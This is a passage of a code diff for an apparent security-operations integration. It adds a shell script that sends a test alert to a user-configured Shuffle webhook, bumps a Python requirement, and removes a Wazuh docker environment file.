+SHUFFLE_WEBHOOK_URL="${SHUFFLE_WEBHOOK_URL:-}"
+INTEGRATOR_URL="${INTEGRATOR_URL:-http://localhost:8088}"
+INTERNAL_KEY="${INTERNAL_KEY:-}"
+
+if [[ -z "${SHUFFLE_WEBHOOK_URL}" ]]; then
+  echo "error: SHUFFLE_WEBHOOK_URL is required"
+  echo "example:"
+  echo "  SHUFFLE_WEBHOOK_URL='http://localhost:3001/api/v1/hooks/webhook_...' \\"
+  echo "  bash soc-integrator/examples/send_to_shuffle_webhook.sh"
+  exit 1
+fi
+
+curl -sS -X POST "${SHUFFLE_WEBHOOK_URL}" \
+  -H "Content-Type: application/json" \
+  -d "{
+    \"event_id\": \"soc-integrator-test-$(date +%s)\",
+    \"source\": \"soc-integrator\",
+    \"severity\": \"high\",
+    \"title\": \"Suspicious VPN login outside Thailand\",
+    \"description\": \"Detected by soc-integrator test script\",
+    \"integrator_url\": \"${INTEGRATOR_URL}\",
+    \"internal_key\": \"${INTERNAL_KEY}\"
+  }"
+
+echo
+echo "sent webhook payload to Shuffle"

soc-integrator/requirements.txt

@@ -3,3 +3,4 @@ uvicorn==0.35.0
 httpx==0.28.1
 pydantic-settings==2.10.1
 psycopg[binary]==3.2.1
+python-multipart==0.0.20

wazuh-docker/.env

@@ -1,6 +0,0 @@
-WAZUH_VERSION=4.14.3
-WAZUH_IMAGE_VERSION=4.14.3
-WAZUH_TAG_REVISION=1
-FILEBEAT_TEMPLATE_BRANCH=4.14.3
-WAZUH_FILEBEAT_MODULE=wazuh-filebeat-0.5.tar.gz
-WAZUH_UI_REVISION=1